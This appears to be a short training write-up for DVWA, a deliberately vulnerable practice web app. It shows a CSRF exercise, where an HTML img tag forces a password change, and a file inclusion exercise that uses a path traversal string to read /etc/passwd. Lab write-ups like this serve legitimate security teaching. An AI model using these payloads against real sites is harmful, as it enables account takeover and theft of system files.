DVWA Exercises 3
05 CSRF Attack

Let's type in a password and grab the request in Burp

The attacker must prepare a Website with a manipulated string. This attack only works if the victim is logged in on the target website (session cookie must be valid) and clicks on the manipualted link.
Attackers Side:
cd /home/hacker
mkdir webroot
python3 -m http.server 8001

Create a html file with the following content:
<img src="http://10.70.0.1/vulnerabilities/csrf/?password_new=Secret1&password_conf=Secret1&Change=Change">
Victim Side:



06 File Inclusion


Attack string:
http://172.17.0.1/vulnerabilities/fi/?page=../../../../../etc/passwd

Last updated
Was this helpful?